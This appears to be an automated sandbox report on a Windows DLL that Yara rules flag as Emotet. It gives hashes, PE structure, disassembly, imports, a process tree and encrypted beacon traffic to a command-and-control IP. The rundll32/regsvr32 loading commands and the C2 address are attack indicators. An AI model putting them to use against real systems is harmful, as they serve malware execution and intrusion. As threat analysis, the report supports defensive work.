                                                                                                SHA1:D63B9D6F2352BDDF4200690152B54C766A57ACCA
                                                                                                SHA-256:C63F6970D4B79AD0537F5CE3DEF68C8A76C98AA1B93188488717DB477A488BA5
                                                                                                SHA-512:4B209729AD1D096B37BFDD6966D8DAB8895B16D81944CD5C001E746408DD04C8F187489D19FE96DFC9A2940840B02628AC228274639C1F1284925F319BD2A296
                                                                                                Malicious:false
                                                                                                Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                Entropy (8bit):6.482087993127552
                                                                                                TrID:
                                                                                                • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                • DOS Executable Generic (2002/1) 1.70%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                File name:1Klocu2k7B.dll
                                                                                                File size:545280
                                                                                                MD5:ce75ec6dff9fca7fd1c20269811e7cd6
                                                                                                SHA1:dce479a4927227ba78dd6bd876b60abc7c0b5acd
                                                                                                SHA256:cb5d6edc7f65880cb51cd99d81dffa44dc801150bd4c27cf01749a305c26285b
                                                                                                SHA512:07f2d6efc000af10cdd5c3386cbea71e6c2ed04aecab6c6a50d2f00cc261ef7b6df921da80ed9e27dd5e7be1f10deb2ca84be8e55462a88e9d1818a294df697b
                                                                                                SSDEEP:12288:B4UJY9B+TenWsSEPHjMOUP9uXdt7JpfYNVr9RM54RutCTdJGqIoTCZ4eEsZkHxHy:B4UJY9BSenZSEPHjMOUP9Udt7JpfYNVs
                                                                                                TLSH:2FC4CFA5435C08FCE762C3395C975BC5B1F7BDAE0664AF260BC18DA05E1BA90F53A381
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.H.v.&.v.&.v.&.h...o.&.h...2.&.h.....&.Q6].s.&.v.'.9.&.h...w.&.h...w.&.h...w.&.h...w.&.Richv.&.........PE..d.....}b.........."
                                                                                                Icon Hash:74f0e4ecccdce0e4
                                                                                                Entrypoint:0x1800423a8
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x180000000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                Time Stamp:0x627D8598 [Thu May 12 22:09:28 2022 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:5
                                                                                                OS Version Minor:2
                                                                                                File Version Major:5
                                                                                                File Version Minor:2
                                                                                                Subsystem Version Major:5
                                                                                                Subsystem Version Minor:2
                                                                                                Import Hash:b268dbaa2e6eb6acd16e04d482356598
                                                                                                Instruction
                                                                                                dec eax
                                                                                                mov dword ptr [esp+08h], ebx
                                                                                                dec eax
                                                                                                mov dword ptr [esp+10h], esi
                                                                                                push edi
                                                                                                dec eax
                                                                                                sub esp, 20h
                                                                                                dec ecx
                                                                                                mov edi, eax
                                                                                                mov ebx, edx
                                                                                                dec eax
                                                                                                mov esi, ecx
                                                                                                cmp edx, 01h
                                                                                                jne 00007FBE109719D7h
                                                                                                call 00007FBE10973B64h
                                                                                                dec esp
                                                                                                mov eax, edi
                                                                                                mov edx, ebx
                                                                                                dec eax
                                                                                                mov ecx, esi
                                                                                                dec eax
                                                                                                mov ebx, dword ptr [esp+30h]
                                                                                                dec eax
                                                                                                mov esi, dword ptr [esp+38h]
                                                                                                dec eax
                                                                                                add esp, 20h
                                                                                                pop edi
                                                                                                jmp 00007FBE10971880h
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                dec eax
                                                                                                mov dword ptr [esp+08h], ecx
                                                                                                dec eax
                                                                                                sub esp, 00000088h
                                                                                                dec eax
                                                                                                lea ecx, dword ptr [00014D05h]
                                                                                                call dword ptr [0000FC7Fh]
                                                                                                dec esp
                                                                                                mov ebx, dword ptr [00014DF0h]
                                                                                                dec esp
                                                                                                mov dword ptr [esp+58h], ebx
                                                                                                inc ebp
                                                                                                xor eax, eax
                                                                                                dec eax
                                                                                                lea edx, dword ptr [esp+60h]
                                                                                                dec eax
                                                                                                mov ecx, dword ptr [esp+58h]
                                                                                                call 00007FBE1098055Ah
                                                                                                dec eax
                                                                                                mov dword ptr [esp+50h], eax
                                                                                                dec eax
                                                                                                cmp dword ptr [esp+50h], 00000000h
                                                                                                je 00007FBE10971A13h
                                                                                                dec eax
                                                                                                mov dword ptr [esp+38h], 00000000h
                                                                                                dec eax
                                                                                                lea eax, dword ptr [esp+48h]
                                                                                                dec eax
                                                                                                mov dword ptr [esp+30h], eax
                                                                                                dec eax
                                                                                                lea eax, dword ptr [esp+40h]
                                                                                                dec eax
                                                                                                mov dword ptr [esp+28h], eax
                                                                                                dec eax
                                                                                                lea eax, dword ptr [00014CB0h]
                                                                                                dec eax
                                                                                                mov dword ptr [esp+20h], eax
                                                                                                dec esp
                                                                                                mov ecx, dword ptr [esp+50h]
                                                                                                dec esp
                                                                                                mov eax, dword ptr [esp+58h]
                                                                                                dec eax
                                                                                                mov edx, dword ptr [esp+60h]
                                                                                                xor ecx, ecx
                                                                                                call 00007FBE10980508h
                                                                                                jmp 00007FBE109719F4h
                                                                                                dec eax
                                                                                                mov eax, dword ptr [eax+eax+00000000h]
                                                                                                Programming Language:
                                                                                                • [ C ] VS2008 build 21022
                                                                                                • [LNK] VS2008 build 21022
                                                                                                • [ASM] VS2008 build 21022
                                                                                                • [IMP] VS2005 build 50727
                                                                                                • [RES] VS2008 build 21022
                                                                                                • [EXP] VS2008 build 21022
                                                                                                • [C++] VS2008 build 21022
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x55cf00x6f.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5544c0x3c.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x2dffc.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x590000xe1c.pdata
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000x1d8.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x520000x288.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x504ca0x50600False0.389081940124zlib compressed data5.26882252971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x520000x3d5f0x3e00False0.355279737903data5.39267570685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x560000x20d80x1200False0.180772569444data2.18161586025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                .pdata0x590000xe1c0x1000False0.44580078125data4.98556265168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x5a0000x2dffc0x2e000False0.839408542799data7.73448363752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x880000x6f80x800False0.1796875data1.81179169858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_RCDATA0x5a0a00x2de00dataEnglishUnited States
                                                                                                RT_MANIFEST0x87ea00x15aASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                DLLImport
                                                                                                KERNEL32.dllExitProcess, VirtualAlloc, CompareStringW, CompareStringA, GetTimeZoneInformation, GetLocaleInfoW, GetCurrentThreadId, FlsSetValue, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, EncodePointer, DecodePointer, TlsAlloc, FlsGetValue, FlsFree, SetLastError, GetLastError, GetCurrentThread, FlsAlloc, HeapFree, Sleep, GetModuleHandleW, GetProcAddress, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapSetInformation, HeapCreate, HeapDestroy, RtlUnwindEx, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, HeapAlloc, HeapReAlloc, WriteFile, SetConsoleCtrlHandler, FreeLibrary, LoadLibraryA, InitializeCriticalSectionAndSpinCount, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetDateFormatA, GetTimeFormatA, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, HeapSize, SetEnvironmentVariableA
                                                                                                ole32.dllCoTaskMemFree, CoLoadLibrary, CoTaskMemAlloc
                                                                                                NameOrdinalAddress
                                                                                                DllRegisterServer10x180042050
                                                                                                DllUnregisterServer20x180042080
                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                May 14, 2022 05:10:03.501260996 CEST49754443192.168.2.323.239.0.12
                                                                                                May 14, 2022 05:10:03.501298904 CEST4434975423.239.0.12192.168.2.3
                                                                                                May 14, 2022 05:10:03.501377106 CEST49754443192.168.2.323.239.0.12
                                                                                                May 14, 2022 05:10:03.602658987 CEST49754443192.168.2.323.239.0.12
                                                                                                May 14, 2022 05:10:03.602685928 CEST4434975423.239.0.12192.168.2.3
                                                                                                May 14, 2022 05:10:04.160854101 CEST4434975423.239.0.12192.168.2.3
                                                                                                May 14, 2022 05:10:04.161048889 CEST49754443192.168.2.323.239.0.12
                                                                                                May 14, 2022 05:10:07.734637022 CEST49754443192.168.2.323.239.0.12
                                                                                                May 14, 2022 05:10:07.734673977 CEST4434975423.239.0.12192.168.2.3
                                                                                                May 14, 2022 05:10:07.734956980 CEST4434975423.239.0.12192.168.2.3
                                                                                                May 14, 2022 05:10:07.735169888 CEST49754443192.168.2.323.239.0.12
                                                                                                May 14, 2022 05:10:07.740267992 CEST49754443192.168.2.323.239.0.12
                                                                                                May 14, 2022 05:10:07.780517101 CEST4434975423.239.0.12192.168.2.3
                                                                                                May 14, 2022 05:10:08.585264921 CEST4434975423.239.0.12192.168.2.3
                                                                                                May 14, 2022 05:10:08.585366964 CEST4434975423.239.0.12192.168.2.3
                                                                                                May 14, 2022 05:10:08.585997105 CEST49754443192.168.2.323.239.0.12
                                                                                                May 14, 2022 05:10:08.589047909 CEST49754443192.168.2.323.239.0.12
                                                                                                May 14, 2022 05:10:08.589077950 CEST4434975423.239.0.12192.168.2.3
                                                                                                • 23.239.0.12
                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.34975423.239.0.12443C:\Windows\System32\regsvr32.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2022-05-14 03:10:07 UTC0OUTGET / HTTP/1.1
                                                                                                Cookie: xuG=xWaVIxmlebPbaJHEIrQ0fbxnFEn0sAEIgsR7w9CORqGcUqZA2KwjTd6krDnDc9qkAviibKLZfZRfbo7cmq/KNi4xlyyeQT/8Gu8lVgMPU7K3+hrHswvKNj2B24KCO5h/6sGu973IP8je50zJyXAsyjPYnfHQxjlHj0xvdafXFdGJFICGaLkLQ8Nz5i5OsAykpKaioQ8/NvfSOL+0fL6dpyaj0oeOBABb2y4wbF6z/zqO6lfB5AeRctJlQvM2mgX5D70Pz8DrXIY+RK1/9np5WQ==
                                                                                                Host: 23.239.0.12
                                                                                                Connection: Keep-Alive
                                                                                                Cache-Control: no-cache
                                                                                                2022-05-14 03:10:08 UTC0INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Sat, 14 May 2022 03:10:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                2022-05-14 03:10:08 UTC0INData Raw: 33 36 31 0d 0a 5d d7 56 4c fc 44 30 ab 67 e0 4f 1d c2 fd 4e 3f dc 7e 5c 73 15 fc a9 a0 a3 97 ad 11 69 5b e0 47 71 1e 93 85 de 15 97 ba 87 7f 7e 9e 92 0e 2f 27 bc 11 89 3f de 31 9b 75 68 d7 68 79 35 02 d7 2d 95 c3 9a 36 02 e0 2c 6f 88 08 09 38 77 ff 63 68 34 0d 80 6a db 61 f0 ef 60 9b aa 65 ae 04 bd e6 0b 2e 6c 83 a7 a3 c2 02 88 90 98 00 7c d5 73 23 98 8f 67 a7 58 4a 8a 93 ab fa 49 f1 bb 9b 68 5c f5 9f 9e 17 2b 4c e3 ed e1 34 bf 0a 1d 0f 55 96 18 6e ad 7b 3d 10 ce a9 d5 70 15 d8 5b 55 1b 46 9a d3 92 e3 77 ba 81 7c 62 4e 21 90 10 6c 0d 66 22 90 4e f8 f3 0a ce d2 eb ff c5 2e c5 7d 2e 32 24 8b 23 63 50 85 32 ec 93 41 c6 3d 6c c1 92 12 3b d4 fc 39 04 da 4e f5 33 24 10 bd 41 39 29 41 3f c7 c2 7e b5 8a 9a 17 a6 8e eb d8 72 f6 5c 98 70 b0 8f 09 39 ea 29 fe 80 37
                                                                                                Data Ascii: 361]VLD0gON?~\si[Gq~/'?1uhhy5-6,o8wch4ja`e.l|s#gXJIh\+L4Un{=p[UFw|bN!lf"N.}.2$#cP2A=l;9N3$A9)A?~r\p9)7


                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:05:09:26
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\loaddll64.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:loaddll64.exe "C:\Users\user\Desktop\1Klocu2k7B.dll"
                                                                                                Imagebase:0x7ff6d8b90000
                                                                                                File size:140288 bytes
                                                                                                MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:1
                                                                                                Start time:05:09:27
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1
                                                                                                Imagebase:0x7ff698e50000
                                                                                                File size:273920 bytes
                                                                                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:2
                                                                                                Start time:05:09:28
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:regsvr32.exe /s C:\Users\user\Desktop\1Klocu2k7B.dll
                                                                                                Imagebase:0x7ff6cd2e0000
                                                                                                File size:24064 bytes
                                                                                                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.302181503.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.301146788.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high

                                                                                                Target ID:3
                                                                                                Start time:05:09:28
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe "C:\Users\user\Desktop\1Klocu2k7B.dll",#1
                                                                                                Imagebase:0x7ff7d82b0000
                                                                                                File size:69632 bytes
                                                                                                MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.298205207.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.298619833.000001FDEC700000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high

                                                                                                Target ID:4
                                                                                                Start time:05:09:28
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\1Klocu2k7B.dll,DllRegisterServer
                                                                                                Imagebase:0x7ff7d82b0000
                                                                                                File size:69632 bytes
                                                                                                MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.299143403.000001E219BE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.298411789.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high

                                                                                                Target ID:5
                                                                                                Start time:05:09:31
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                Target ID:6
                                                                                                Start time:05:09:32
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\1Klocu2k7B.dll,DllUnregisterServer
                                                                                                Imagebase:0x7ff7d82b0000
                                                                                                File size:69632 bytes
                                                                                                MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.329868359.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.329600804.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000000.304106272.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000000.303897214.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000000.304900388.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000000.305651593.000001F1CBE10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high

                                                                                                Target ID:7
                                                                                                Start time:05:09:35
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JRkpZLNCkFz\TYmfFCbFTVEkATZ.dll"
                                                                                                Imagebase:0x7ff6cd2e0000
                                                                                                File size:24064 bytes
                                                                                                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.808360106.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.808194532.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high

                                                                                                Target ID:8
                                                                                                Start time:05:09:36
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:10
                                                                                                Start time:05:09:38
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:11
                                                                                                Start time:05:09:39
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:12
                                                                                                Start time:05:09:39
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 992 -s 316
                                                                                                Imagebase:0x7ff6c7fd0000
                                                                                                File size:494488 bytes
                                                                                                MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:13
                                                                                                Start time:05:09:40
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                Imagebase:0x7ff710c70000
                                                                                                File size:163336 bytes
                                                                                                MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:14
                                                                                                Start time:05:09:47
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:15
                                                                                                Start time:05:09:47
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:19
                                                                                                Start time:05:10:20
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:23
                                                                                                Start time:05:10:31
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                Imagebase:0x7ff73c930000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:25
                                                                                                Start time:05:10:49
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                Imagebase:0x7ff7b0320000
                                                                                                File size:455656 bytes
                                                                                                MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:26
                                                                                                Start time:05:10:50
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language

                                                                                                Target ID:27
                                                                                                Start time:05:10:54
                                                                                                Start date:14/05/2022
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
